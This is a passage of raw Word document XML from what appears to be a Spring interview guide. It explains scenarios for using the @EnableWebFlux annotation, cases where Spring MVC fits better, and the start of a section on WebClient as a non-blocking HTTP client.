        <w:t>In which scenarios would you use this annotation</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="505"/>
    </w:p>
    <w:p w14:paraId="4D3E74DF" w14:textId="71284183" w:rsidR="00281739" w:rsidRPr="00B13F85" w:rsidRDefault="00281739"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he @EnableWebFlux annotation is used in scenarios where you want to enable </w:t>
      </w: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xml:space="preserve">, which is the reactive programming model provided by Spring. This annotation is specifically used when you are developing applications that require </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking</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asynchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> processing for better scalability and concurrency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70167908"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Here are scenarios where you would use the @EnableWebFlux annotation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292E28EF"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 Real-Time Applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE52A92"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xml:space="preserve"> Chat applications, live updates, gaming backends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749F0365"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son:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> WebFlux is ideal for handling a large number of concurrent connections without blocking threads. Since it uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, it can handle many concurrent users (such as clients connected to a chat server) efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13522A50"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2. Microservices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522DF2D6"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lastRenderedPageBreak/>
        <w:t>Example:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Microservices architectures with high throughput and low latency requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C9E94A"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son:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> WebFlux's reactive model is highly suitable for handling asynchronous and event-driven communication between microservices. It can manage a large number of requests and responses efficiently, which is crucial in microservices environments that require scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280784CA"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3. Highly Concurrent API Services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437E091B"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xml:space="preserve"> APIs with a large number of clients, like stock price APIs, news aggregation services, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553034D6"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son:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> WebFlux allows you to handle thousands of concurrent requests without the need to allocate threads for each one, which is important for applications where latency is critical and the number of concurrent requests is high.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3567E264"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4. Real-Time Data Processing Systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D64D856"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xml:space="preserve"> Event-driven applications or systems processing streams of data, such as IoT platforms or telemetry data collection services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CC5C6B"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son:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> WebFlux supports reactive streams using </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Project Reactor</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which makes it an ideal fit for systems that need to process streams of data in real-time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B025468"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5. Serverless Applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336CE3F6"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xml:space="preserve"> Serverless applications where you want to handle many lightweight requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73722776"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son:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Since WebFlux is non-blocking, it integrates well with serverless architectures, where functions are lightweight and request processing needs to be fast and non-blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D60C490"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6. Streaming Data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0461BB55"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xml:space="preserve"> Applications that deal with media streaming, audio/video streaming, or continuous data feeds (e.g., sensor data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345C5876"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son:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> WebFlux is optimized for handling large data streams asynchronously, making it ideal for building services that need to manage continuous or real-time data streams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BA83A1"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7. Low Latency, High Throughput Systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F588C61"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xml:space="preserve"> Applications requiring ultra-low latency, such as high-frequency trading platforms or real-time monitoring systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330E5DB9"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son:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> WebFlux offers high throughput and low latency because of its non-blocking nature, which is essential for applications where delays in request processing are unacceptable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492E5F0B"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8. Reactive Frontend Integration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130104DC"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xml:space="preserve"> Single-page applications (SPAs) with real-time updates, like social media feeds or real-time notifications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292439ED"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son:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> WebFlux can work seamlessly with reactive JavaScript frameworks on the frontend (such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RxJS</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WebSockets</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) to implement real-time updates and events, improving user experience in scenarios where real-time communication is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCEEFF1"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9. Scalable Backend APIs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D7EF41"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xml:space="preserve"> Large-scale backend APIs that provide access to resources such as databases or file systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15027073"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son:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Since WebFlux handles connections in a non-blocking manner, it allows the backend to scale better without consuming excessive server resources, which is crucial for handling a growing number of client requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A0AB78"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0. Cloud-Native Applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DEDD35"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xml:space="preserve"> Applications deployed in a cloud environment with scalability requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D90016"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son:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> WebFlux's ability to handle asynchronous and reactive streams makes it well-suited for cloud-native architectures, where you need services that can scale horizontally and efficiently handle numerous requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE530EC"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1. Use of Reactive Data Sources:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05929AEA"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xml:space="preserve"> Databases that support reactive programming (e.g., MongoDB with reactive driver).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644DB9EE"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son:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> If your data source supports reactive operations (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactive MongoDB</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R2DBC</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for SQL databases), using WebFlux allows you to take advantage of the non-blocking I/O model end-to-end, making your application fully reactive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E2BEC6"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2. Handling Complex I/O Bound Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BD6734"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xml:space="preserve"> Services that perform complex I/O-bound operations like calling external APIs, processing data from multiple sources, or accessing file systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522D1559"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son:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> WebFlux can help manage these I/O-bound tasks in a more efficient way by leveraging asynchronous processing, thus allowing the application to handle many tasks concurrently without blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2698E0E8" w14:textId="77777777" w:rsidR="00281739"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419BDE1">
          <v:rect id="_x0000_i2292" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F8FB7F" w14:textId="77777777" w:rsidR="00281739" w:rsidRPr="00B13F85" w:rsidRDefault="0028173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When Not to Use @EnableWebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D52175"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Traditional MVC Applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: If you are building a typical </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>blocking</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imperative</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> web application with relatively low concurrency, Spring MVC (using @EnableWebMvc) might be a better choice since it is simpler and better suited for conventional use cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26717C0B"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lastRenderedPageBreak/>
        <w:t>Heavy Computational Tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If your application involves heavy computation that isn't asynchronous, WebFlux may not provide the expected performance improvements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB0731B"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Applications with Simple Request-Response Logic</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For simple applications that do not require high concurrency or real-time data, Spring MVC could be a better fit, as WebFlux introduces additional complexity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3CCD18" w14:textId="77777777" w:rsidR="00281739"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A96260C">
          <v:rect id="_x0000_i2293" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D94D5FA" w14:textId="77777777" w:rsidR="00281739" w:rsidRPr="00B13F85" w:rsidRDefault="0028173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summary, @EnableWebFlux is used in scenarios where scalability, high concurrency, real-time data processing, and low latency are required, making it a great choice for reactive, event-driven applications and microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA95CE"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5FDE5E3">
          <v:rect id="_x0000_i2294" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1851D69B" w14:textId="1C887FB7"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06" w:name="_Toc196307986"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the role of WebClient in Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="506"/>
    </w:p>
    <w:p w14:paraId="79951E6E" w14:textId="7F0E2CDF" w:rsidR="00E32D56" w:rsidRPr="00B13F85" w:rsidRDefault="00E32D56"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he </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w: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xml:space="preserve"> is a non-blocking, reactive HTTP client used for making HTTP requests in a reactive way. It is part of the spring-webflux module and serves as an alternative to the traditional </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RestTemplate</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BD6828"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Role and Purpose of WebClient in Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4551ACA9"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Non-Blocking I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695998F9"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WebClient is designed to work in a non-blocking manner, meaning it does not block the thread while waiting for the response from the server. This is a core feature of </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, making it ideal for high-concurrency scenarios where many requests are handled concurrently without consuming a lot of threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4E7089"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ctive HTTP Requests</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353FF6B6"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t supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous</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reactive</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> programming, allowing the application to issue HTTP requests and handle responses using reactive types such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Mono</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Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This allows efficient handling of large volumes of concurrent requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E86DC5"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upports Multiple HTTP Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC80D9B"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WebClient can handle </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all HTTP methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>GET</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POST</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PUT</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DELETE</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc., and it can also manage request headers, request bodies, query parameters, and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BEFB02"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omposability</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B02D68"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ebClient is highly composable. You can chain operations together using reactive operators. For example, you can transform the response data or handle errors in a fluent way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCAB2AB"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upport for Different Data Formats</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E351354"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t can be used to interact with </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RESTful APIs</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
